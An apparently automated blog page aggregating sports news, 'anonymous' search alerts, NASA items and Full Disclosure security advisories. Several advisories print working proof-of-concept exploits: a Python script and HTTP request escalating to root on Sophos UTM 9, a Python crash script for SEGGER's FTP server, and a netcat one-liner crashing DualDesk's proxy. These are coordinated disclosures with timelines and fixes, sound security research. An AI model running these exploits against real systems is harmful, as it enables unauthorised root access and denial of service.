Patrick McGuire: 2018-02-25

Saturday, March 3, 2018

Anonymous Art Show

Anonymous Art Show. img_5673 · 96d1db1d-f494-434b-bfa7-95e34dd16891 · female hands with pen writing on notebook · Title - "On A Moonlit Night" (The year of winter white) Artisan · tiger_painting_andrea_mueller_art_whistler-e1520023252952 · feature-e1520024107638 · img_4813 · img_4910.

from Google Alert - anonymous http://ift.tt/2FcZ5G3
via IFTTT

Orioles: 1B Chris Davis (elbow/forearm) sidelined 3-5 days; MRI revealed no structural damage (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens should feel the heat from 3-year playoff drought, says GM Ozzie Newsome (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Friday, March 2, 2018

Ravens: Robbery charge against CB Marlon Humphrey dismissed (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service

KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service Advisory ID: KL-001-2018-007 Publication Date: 2018.03.02 Publication URL: http://ift.tt/2HYyuOt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation) Impact: Privilege Escalation Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root. 3. Technical Description 1. Obtain the a privileged session token $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7 loginuser@1.3.3.7's password: $ python kl-loginuser-confd-priv_esc.py pojiZSqWEUAUDNIQtSop 2. Using that session token, set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:4444/ Content-Length: 422 Cookie: SID=pojiZSqWEUAUDNIQtSop DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:33:53 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 178895 {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000] 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at: http://ift.tt/2oJHuyk 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline. 2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos. 2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos. 2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos. 2018.01.12 - KoreLogic requests an update from Sophos. 2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February. 2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos. 2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos. 2018.03.01 - UTM 9.508 released by Sophos. 2018.03.02 - KoreLogic public disclosure. 7. Proof of Concept from socket import socket,AF_INET,SOCK_STREAM class Exploit: def __init__(self): self.host = '127.0.0.1' self.port = 4472 self.connected = False self.s = None return None def disconnect(self): self.s.close() return True def send_trigger(self): packet_one = '00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex') self.s.send(packet_one) self.s.recv(4096) packet_two = '00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex') self.s.send(packet_two) self.s.recv(4096) packet_three = '0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex') self.s.send(packet_three) print self.s.recv(4096).strip() return True def connect(self): self.s = socket(AF_INET, SOCK_STREAM) self.s.connect((self.host,self.port)) self.connected = True return True def run(self): self.connect() self.send_trigger() self.disconnect() return True if __name__=="__main__": Exploit().run() The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2017-12544 XSS on HPE System Management Homepage v7.6.0.11 and minor

[FD] Content Injection in Samsung Display Solutions Application for Android [CVE-2018-6019]

[Original post here: http://ift.tt/2H0vorV] TITLE Content Injection in Samsung Display Solutions Application for Android [CVE-2018-6019] SUMMARY Samsung Display Solutions App for Android did not use encryption (SSL) for information transmission, thus allowing an MITM attacker to inject their own content into the app. The vendor fixed this issue and users should install the latest version (3.02 or above). MITRE has assigned CVE-2018-6019 to track this issue. DETAILS Samsung makes an Android application that allows users to browse B2B content related to Samsung’s display products. While performing network level testing, we discovered that the content shown in the app was loaded via server calls made by the application without any kind of encryption (SSL). This allowed an MITM attacker to inject their own content into the app. To observe the issue on v3.01: 1. Install the application on the device. 2. Setup an MITM proxy but do not install the SSL certificate on the device (we used PacketCapture). 3. Start the proxy. At this point all network traffic will be going through the proxy with the SSL traffic being encrypted by a self-signed certificate which is not trusted by the device. 4. Open the app. 5. Go back to the proxy and observe captured traffic. All testing was done on Android 7 and application version 3.01. Network captures were performed using an on-device proxy (PacketCapture) without a trusted SSL certificate. VENDOR RESPONSE The vendor fixed this issue and users should install the latest version (3.02 or above). REFERENCES CVE ID: CVE-2018-6019 Google Play Link: http://ift.tt/2Flb5IV BOUNTY INFORMATION This issue was originally reported to the Samsung Mobile Security Bounty Program but was deemed to be out of scope. However, after being transferred to the Display Solutions team, this issue qualified for the Samsung TV Bounty Program. CREDITS Advisory written by Yakov Shafranovich. TIMELINE 2017-09-09: Reported to Samsung Mobile Security bounty program 2017-09-09: Automated response from the vendor received 2017-10-18: Engineer assigned to the issue 2017-11-19: Deemed out of scope; reply sent 2017-11-25: Vendor requests additional information; reply sent 2017-11-27: Issue rejected, public disclosure requested 2017-12-06: Reply from vendor received, additional information requested; reply sent 2017-12-07: Additional information requested by the vendor 2017-12-09: Reply sent with screenshots 2018-01-08: Vendor accepts the issue as in scope, and plans remediation 2018-01-11: Issue transferred to the Samsung TV bounty program 2018-01-14: Fixed version released 2018-01-22: CVE requested and received from MITRE 2018-02-14: Vendor requests confirmation of the fix, fix confirmed and reply sent 2018-03-25: Draft advisory sent to vendor for review; bounty payment received 2018-03-01: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] CSRF vulnerabilities in D-Link DGS-3000-10TC

Hello list! There are Cross-Site Request Forgery vulnerabilities in D-Link DGS-3000-10TC. In previous advisory I wrote about Cross-Site Scripting and Content Spoofing vulnerabilities.

Source: Gmail -> IFTTT-> Blogger

[FD] Another TCP based IDS bypass technique. CVE-2018-6794

-------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2FLOFhE [+] ISR: Apparition Security Vendor: ============= www.segger.com Product: =========== embOS/IP FTP Server v3.22 Vulnerability Type: =================== FTP Commands Denial Of Service CVE Reference: ============== CVE-2018-7449 Security Issue: ================ SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command. STOR 666\r\n LIST\r\n RETR '+'..\\'*8+'Windows\system.ini\r\n TELNET x.x.x.x 21 220 Welcome to embOS/IP FTP server USER anonymous 331 Password required. PASS anonymous 230 User logged in, proceed. STOR Bye! CRASH!!! Exploit/POC: ============= import socket,time VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ') USR='anonymous' PWD='anonymous' CMD="STOR Bye!\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((VICTIM, 21)) print s.recv(1024) # Recieve FTP Banner time.sleep(1) s.send("USER " + USR+ "\r\n") print s.recv(1024) time.sleep(1) s.send("PASS "+ PWD+"\r\n") # print s.recv(1024) time.sleep(1) s.send(CMD) print 'Sent %s' % CMD s.close() Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: February 17, 2018 Vendor acknowledgement: February 19, 2018 Vendor released fixed version v3.22a : February 23, 2018 March 1, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://ift.tt/2GUqooI [+] ISR: Apparition Security Vendor: =============== www.dualdesk.com Product: =========== DualDesk v20 DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no configuration. Vulnerability Type: =================== Denial Of Service CVE Reference: ============== CVE-2018-7583 Security Issue: ================ Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application which listens on TCP Port 5500 by sending a long string of junk chars. (d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available) eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000 eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x15: 77c6016d 83c404 add esp,4 Exploit/POC: ============= Start the Dualdesk Run Proxy as Application. C:\>python -c "print 'a'*8000" > crash.txt C:\>type crash.txt | nc.exe localhost 5500 Crash!!! Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: February 4, 2018 Second attempt : February 17, 2018 Request CVE, assigned by Mitre : March 1, 2018 March 1, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Ravens: Ozzie Newsome says biggest project in his final season as GM is to get Joe Flacco better targets (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 3/01/2018

Plant Gravity Perception (PGP): Today the crew removed the Plant Gravity Perception seed cassettes from Experiment Containers (ECs) on the two European Modular Cultivation System (EMCS) rotors and stowed them in a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI). They also replaced the ECs on the rotors with ECs for the next Plant … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2Ff0cZ4
via IFTTT

Biggest-Ever DDoS Attack (1.35 Tbs) Hits Github Website

On Wednesday, February 28, 2018, GitHub's code hosting website hit with the largest-ever distributed denial of service (DDoS) attack that peaked at record 1.35 Tbps. Interestingly, attackers did not use any botnet network, instead weaponized misconfigured Memcached servers to amplify the DDoS attack. Earlier this week we published a report detailing how attackers could abuse Memcached,

from The Hacker News http://ift.tt/2F5ZzNY
via IFTTT

Thursday, March 1, 2018

Missing profile images for anonymous visitors when Social Private Files is turned on

With Social Private Files turned on the profile images are saved in the private files folder. This works ok, but for some display modes the profile image is not replaced by the default image. When it is not replaced with the default image a request is done for the normal image. But this one is not accessible ...

from Google Alert - anonymous http://ift.tt/2F3ix7P
via IFTTT

ALCOHOLICS ANONYMOUS 208-235-1444 AL-ANON 208-232-2692

ALCOHOLICS ANONYMOUS 208-235-1444 AL-ANON 208-232-2692.

from Google Alert - anonymous http://ift.tt/2oIj1t4
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2F6bMCx
via IFTTT

JotForm Review: Poor poor service by Anonymous Reviewer

What are the best aspects of this product? Easy to use, great features, let down by extremely poor customer service. Will never use again, paid for a service that was cut off without warning for no reason whatsoever. Rude staff. What aspects are problematic or could work better? Locked out of my paid ...

from Google Alert - anonymous http://ift.tt/2FexaZe
via IFTTT

The Lunar X

The striking X in this lunarscape is easily visible in binoculars or a small telescope, but not too many have seen it. The catch is, this lunar X is fleeting and only apparent in the hours before the Moon's first quarter phase. Along the shadow line between lunar day and night, the X illusion is produced by a configuration of craters seen here toward the left, Blanchinus, La Caille and Purbach. Near the Moon's first quarter phase, an astronaut standing close to the craters' position would see the slowly rising Sun very near the horizon. Temporarily, crater walls would be in sunlight while crater floors would still be in darkness. Seen from planet Earth, contrasting sections of bright walls against the dark floors by chance look remarkably like an X. This sharp image of the Lunar X was captured on February 22nd. For extra credit, sweep your gaze along the lunar terminator and you can also spot the Lunar V. via NASA http://ift.tt/2HSh71Q

Wednesday, February 28, 2018

Anonymous - Executive Chef

Anonymous – Executive Chef. Posted on February 28, 2018. One of Cambridge's most well-known restaurants is seeking an Executive Chef to lead its dynamic kitchen team. Proper candidates will possess the ability to lead others in their culinary development while fostering a clean, responsible and ...

from Google Alert - anonymous http://ift.tt/2oxAkOv
via IFTTT

Greatest Castlevania ever

Anonymous 02/28/18(Wed)15:13:16 No.408324851 Archived. Greatest Castlevania ever. >> Anonymous 02/28/18(Wed)15:14:44 No.408324983. Anonymous 02/28/18(Wed)15:14:44 No.408324983. >Greatest Castlevania ever >SOTN assets. >> Anonymous 02/28/18(Wed)15:15:41 No.408325043.

from Google Alert - anonymous http://ift.tt/2GQLft5
via IFTTT

Anonymous female agency veteran on what needs to change

An anonymous woman who has worked at multiple agencies talks about how problems in workplace culture stem from white privilege and an acceptance of sexist language and harassment as harmless banter. She also explains that leadership is complicit, saying, "When there are companies who are ...

from Google Alert - anonymous http://ift.tt/2EZaehm
via IFTTT

Anonymous-Feedback-LTI 0.1.1

An LTI app that allows course members to submit anonymous comments.

from Google Alert - anonymous http://ift.tt/2ow8t12
via IFTTT

Why Ravens will be active, but not break the bank in free agency - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2oDunOZ
via IFTTT

Apple Moves iCloud Data and Encryption Keys for Chinese Users to China

Apple has finally agreed to open a new Chinese data center next month to comply with the country's latest controversial data protection law. Apple will now move the cryptographic keys of its Chinese iCloud users in data centers run by a state-owned company called Cloud Big Data Industrial Development Co, despite concerns from human rights activists. In 2017, China passed a Cybersecurity Law

from The Hacker News http://ift.tt/2CsN0Pl
via IFTTT

A Simple Bug Revealed Admins of Facebook Pages — Find Out How

Facebook Page admins are publicly displayed only if admins have chosen to feature their profiles. However, there are some situations where you might want to contact a Facebook page admin or want to find out who is the owner of a Facebook page.  Egyptian security researcher Mohamed A. Baset has discovered a severe information disclosure vulnerability in Facebook that could have

from The Hacker News http://ift.tt/2HRhxWj
via IFTTT

Orioles: Why RP Mychal Givens makes list of MLB's most under-the-radar players - David Schoenfield (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Format Manuscript/Mixed Material

Results: 1-2 of 2 | Refined by: Original Format: Manuscript/Mixed Material Remove Look Inside: Anonymous to Thomas Jefferson, April 20, 1808 (mtj1.041_0396_0397/) Remove ...

from Google Alert - anonymous http://ift.tt/2EXDYew
via IFTTT

Webform 4.16 file upload gives Invalid POST data for anonymous users

We have a webform where anonymous users register themselves for an internship and to do so they upload their documents in the webform. Ours is a prestigious institute and much competition is there to join the short term internship. So sometime per day more than 120 submissions happens for few ...

from Google Alert - anonymous http://ift.tt/2CO75uM
via IFTTT

[FD] SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management

SEC Consult Vulnerability Lab Security Advisory < 20180228-0 > ======================================================================= title: Insecure Direct Object Reference product: TestLink Open Source Test Management vulnerable version: <1.9.17 fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch CVE number: - impact: Medium homepage: http://testlink.org/ found: 2017-09-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

Classes At Saginaw's Thompson Middle School Cancelled Due To Anonymous Threat

Classes have been cancelled for Wednesday at Saginaw's Thompson Middle School. Superintendent Nathaniel McClain says that followed an anonymous call to a school administrator around 4:30 Tuesday afternoon threatening to “shoot up the building”. McClain says staff members are working with ...

from Google Alert - anonymous http://ift.tt/2BUdKXQ
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2oCMIfg
via IFTTT

Wilbon cites anonymous players & teams who think the Rockets are

ESPN's Michael Wilbon took to “Pardon the Interruption” on Tuesday to offer up an intriguing — and anonymously-sourced — report on how the NBA views the top of the league's hierarchy.

from Google Alert - anonymous http://ift.tt/2sZk9Ox
via IFTTT

Memcached Servers Abused for Massive Amplification DDoS Attacks

Cybercriminals have figured out a way to abuse widely-used Memcached servers to launch over 51,000 times powerful DDoS attacks than their original strength, which could result in knocking down of major websites and Internet infrastructure. In recent days, security researchers at Cloudflare, Arbor Networks, and Chinese security firm Qihoo 360 noticed that hackers are now abusing "Memcached" to

from The Hacker News http://ift.tt/2CqaULg
via IFTTT

Tuesday, February 27, 2018

How to spam someones email anonymously

Normally, when you send an email to someone, the email header contains The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right ...

from Google Alert - anonymous http://ift.tt/2ovfCPg
via IFTTT

Trip advisor is NOT anonymous! - TripAdvisor Support Forum

Answer 21 of 23: I did a review on a hotel and the Manager has responded, and addressed me by my full name. How do I contact Trip Advisor about this? I am a Senior Contributor but won't be posting anymore unless this is resolved!

from Google Alert - anonymous http://ift.tt/2CLpYPe
via IFTTT

2018 NFL combine preview: Ravens should focus on every offensive position - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Google anonymous proxy

It hides your real IP address, encrypts your traffic communication to the web, hide your internet history and protecting Apr 27, 2016 HidesterVPN - Free Web Proxy ✓ 100% Free ✓ Anonymous with SSL / HTTPS ✓ No Ads ✓ Enable / Disable cookies ✓ Enable / Disable objects ✓ Choice of two servers ...

from Google Alert - anonymous http://ift.tt/2BWcxyX
via IFTTT

[FD] AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial /css//..%2f substring in a URI. CVE-2018-7467

[FD] Download Protection Bypass in Google’s Chrome (multiple)

[Blog post here: http://ift.tt/2F5iEDp] SUMMARY We have found several instances of files bypassing the download protection offered by Google’s Chrome browser. All of these have been reported to the vendor, and whichever were accepted by the vendor were fixed in Chrome M51 and M52. BACKGROUND The Chrome and Chromium browsers are an open-source based web browser offered by Google. Among it’s features it includes a safety feature that detects unsafe downloads to protect the user. This feature works in multiple ways but is controlled via a file in Chrome’s source code (“download_file_types.asciipb”) which defines several options based on what the file extension of the downloaded files are: - Platform/OS - What kind of warning to show the user - Whether this file type is an archive - Whether the file can be opened automatically by clicking on it in the download area - Whether a ping get sent back to Google for every download of this type (FULL), some downloads (SAMPLED) or not sent at all. This checksum check is used to check against a server-side blacklist of known bad files. The Chrome Rewards bug bounty program includes a separate section covering download bypass that was added in March of 2016. To be eligible, it needs to be on a supported platform (MacOS or Windows), be dangerous by being clicked and not send a full ping back to Google. In December of 2016, the scope of this was changed to only include file extensions already in the source code for Chrome. As part of our testing in scope of this program, we tested all file extensions that are included in a default on MacOS v10.11 (El Capitan) and Windows 2012 R2 / 7 Enterprise. This advisory lists all of the bypasses that we located, reported to the vendor, and the status of whether they were accepted and fixed, or rejected. Most of these were reported prior to the scope change in December 2016, and included patches whenever feasible. DETAILS The following extensions were reported but were rejected as being out of scope and were not fixed: - ChromeOS: APK - Linux: AFM, PFA, TIF - MacOS: APP, CONFIGPROFILE, DFONT, ICC, INTERNETCONNECT, MOBILECONFIG, NETWORKCONNECT, OTF, PREFPANE, PROVISIONPROFILE, QTZ, SAFARIEXTZ, SAVER, TTF, WEBBOOKMARK, WEBLOC - Windows: CAMP, CDMP, DESKTHEMEPACK, DIAGCAB, DIAGPKG, GMMP, ICC, IMESX, MOV, MSU, OTF, PFB, PFM, PRF, RAT, QDS, QT, RDP, SEARCH-MS, THEMEPACK, THEMES, TTC, TTF, WCX The following extensions were reported, confirmed to be dangerous and fixed, all on MacOS (the underlying issue has been described in a separate post). - AS, CDR, CPGZ, DART, DC42, DISKCOPY42, DMGPART, DVDR, IMG, IMGPART, ISO, MPKG, NDIF, PAX, SMI, SPARSEBUNDLE, SPARSEIMAGE, TOAST, UDIF, XIP These issues were fixed in Chrome M51 and M52. REFERENCES - Chrome Bug Reports (rejected): 671382, 671385, 624224, 596342, 605386, 601255, 601250, 600910, 600615, 600609, 600606, 600601, 600597, 600592, 600590, 600587, 600581, 599880 - Chrome Bug Reports (fixed): 596354, 600613, 600907, 600908 BOUNTY INFORMATION The issues that were fixed qualified for the Chrome Rewards security bounty program and a bounty has been paid. CREDITS Advisory written by Yakov Shafranovich. TIMELINE SUMMARY 2016-03-20: First report submitted 2016-03 to 2016-12: multiple other reports submitted, and fixed applied 2016-12-06: Last report submitted 2018-02-26: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] Auto-detection of Compressed Files in Apple’s macOS

[On the web here: http://ift.tt/2GOjaCF] [NOTE: This was originally discovered as a result of a different set of bugs in Google’s Chrome browser, details of which will be posted soon. While the impact of this particular issue isn’t high, it was interesting enough for us to pursue a coordinated disclosure process. Because of the large number of parties involved, the disclosure coordination process took a long time which is why this article took almost two years to publish.] SUMMARY Compressed files on macOS are autodetected by the operating system even if they are renamed to certain other extensions. This can be used to fool users and antivirus software that relies on file extensions by packaging malicious code inside compressed files with different extensions. The vendor (Apple) does not consider this to be a security issue. Most anti-virus vendors for macOS are not affected by this issue. This was originally discovered in macOS v10.11 (El Capitan) and v10.12 (Sierra), but the latest version of macOS v10.13 (High Sierra) was not tested. BACKGROUND On Microsoft Windows, files are identified by their extensions, which appears after the “.” in the filename. On macOS metadata about the file maybe available separately and either a creator code, a type code or a Uniform Type Identifier is used. However, on the Internet (in browsers and email clients) instead of filenames, MIME media types are used with a registry maintained by IANA on behalf of the IETF. Linux systems use a mix of extensions and media types, with some auto-detection / “sniffing” of media types based on file content. Some mappings do exists across the various systems as well. For example, a ZIP archive would be identified as follows: - Windows – .zip extension - Internet/Linux – application/zip media type - macOS UTI – com.pkware.zip-archive Additionally, on most desktop OSes, an association exists between a file type and an application that will open it by default. Those associations are maintained differently from OS to OS, but at their core they associate a particular identifier about a file type such as an extension (Windows) or a media type (browsers), and a program assigned to open it by default. Users are used to this arrangement and many security utilities such as antivirus programs will only look inside files that maybe dangerous. For example, a ZIP file on Windows if renamed to a different extension may not necessarily be scanned by default because double clicking on it will not open it. Another important point is that malware authors may sometimes try to disguise malicious code by compressing it inside an archive such as a ZIP file. The expectation is that when a user downloads it, they will double click and open it using the default program on that platform, and then will execute the malicious code. This is another reason why this functionality deserves a closer look. DETAILS The following two things were discovered: 1. The compression utility that is part of macOS will open any file extension associated with that program and will try to “sniff” / auto-detect the original file type used. The following file extensions were tested: ZIP Files when renamed as: - .AS - .CPGZ - .PAX - .XIP (a Gatekeeper warning will be shown for non-signed files) DMG files when renamed as: - .CDR - .DART - .DC42 - .DISKCOPY42 - .DMG - .DMGPART - .DVDR - .IMG - .IMGPART - .ISO - .NDIF - .SMI - .SPARSEBUNDLE - .SPARSEIMAGE - .TOAST - .UDIF 2. The OS itself (macOS) itself will open and execute some file formats even when renamed to a different extension. Gatekeeper protection is not bypassed. The following extensions are affected: - PKG - MPKG To duplicate the first issue, create a ZIP file containing any content (we used the EICAR test file) and rename to include a file extension as any of the compression formats above for ZIP. (AS, CPGZ, PAX or XIP). Send this file to a macOS computer via USB or email or a link; download and double click. The ZIP file will open correctly. You can also do the same thing but with a DMG file for any of the DMG file formats listed above (DC42, ISO, etc). To duplicate the second issue, create a PKG file containing some code or take an existing one, rename as .MPKG and transfer to a macOS computer. Double click to execute. All testing was done in May 2016 on a MacBook Pro running MacOS v10.11.3 (El Capitan), and re-tested again in April 2017 on a MacBook running MacOS v10.12.04 (Sierra). It is unclear whether later versions of MacOS are affected since we did not perform testing on versions past v10.12.04 (Sierra). RECOMMENDATIONS There are two issues: 1. Human users and anti-malware software are not aware that macOS supports a large number of legacy compression file types and may not be properly looking out for them or scanning them. Because of the “sniffing” behavior, it would be trivial for an attacker to package malware inside a well known format like ZIP or DMG rename it to one of these extensions. 2. Anti-virus software may fail to scan such archives because they do not expect a ZIP file to be packaged that way. The information in this article was originally discovered while analyzing a non-Apple application running on macOS (a separate advisory will be published in the future). Our recommendations are as follows: - Apple should consider deprecating or adding a warning for these extensions and removing the “sniffing” support. - Anti-malware software for macOS should support all of these formats, as well as accounting for the possibility of one format being renamed as another VENDOR RESPONSES The vendor (Apple) does not consider this to be a security issue as follows: >> After examining your report we do not see any actual security implications. >> All of the extensions provided in your report are supported disk image formats and will be treated equally. >> After examining your report we do not see any actual security implications. Archive Utility opens archive files and the extensions you provided are archive extensions. >> After examining your report we do not see any actual security implications. The Installer app makes it clear when executable code is running even if the file has been renamed. As per advice of Apple’s security team, we also contacted multiple antivirus vendors that provide AV software for macOS to check if they are affected by this issue. Here is what we got back: Vendors That Responded: - Avast – not affected - Avira – not affected - AVG – related bug for engine versions prior to 4668 has been fixed earlier (see CVE-2017-9977 and our blog post); other products not affected - BitDefender – not affected - Cisco – one product impacted, tracked by bug identifier CSCve34034 – no CVE has been issued: Cisco AMP Virtual Private Cloud Appliance – The Cisco AMP appliance does not rely on the file extension when processing ZIP archives or PKG install packages. However, older versions relied on file extension to detect DMG files and so is susceptible to one of the scan evasion problems described in the advisory. The DMG portion is now fixed in software release 1.4.5. - ClamXAV (Canimaan Software) – not affected - Comodo – not affected - CyberByte – not affected - Dr. Web – not affected - ESet – not affected - F-Secure – not affected - Intego – not affected - Kaspersky – not affected - Malware Bytes – not affected - Protect Works – not affected - QuickHeal – not affected - Sophos – not affected - Symantec – not affected - Trend Micro – not affected - Webroot – not affected Other Vendors: - 360 Total Security – pending - BullGuard – no response - EScanAV – no response - GData – pending - MacKeeper – no response - McAfee – no response - Panda – no response - QuikAV – pending - Total Defense – pending REFERENCES Apple Product Security Followup Numbers: 638059697, 640528823 and 640528841 Cisco Ref # PSIRT-1814664974 CREDITS Advisory written by Yakov Shafranovich. TIMELINE SUMMARY 2016-03-21: Report # 638059697 submitted 2016-05-04: Reports # 640528823 and 640528841 submitted 2016-05-21: Report # 640528823 rejected 2016-06-22: Report # 638059697 rejected 2016-06-23: Report # 640528841 rejected 2017-03-15: Advisory provided to the vendor for comment 2017-04-23: Retested on macOS Sierra, updated and resent to vendor for comment 2017-04-28: Reply from vendor received 2017-05-01: Retested on a fresh install of macOS Sierra, revised advisory sent to vendor for comment 2017-05-01: Notifications go out to AV vendors 2018-01-24: Second time that notifications go out to AV vendors 2018-02-10: Third and final time that notifications go out to AV vendors 2018-02-10: Final advisory shared with the vendor (Apple) for comment 2018-02-25: Public disclosure

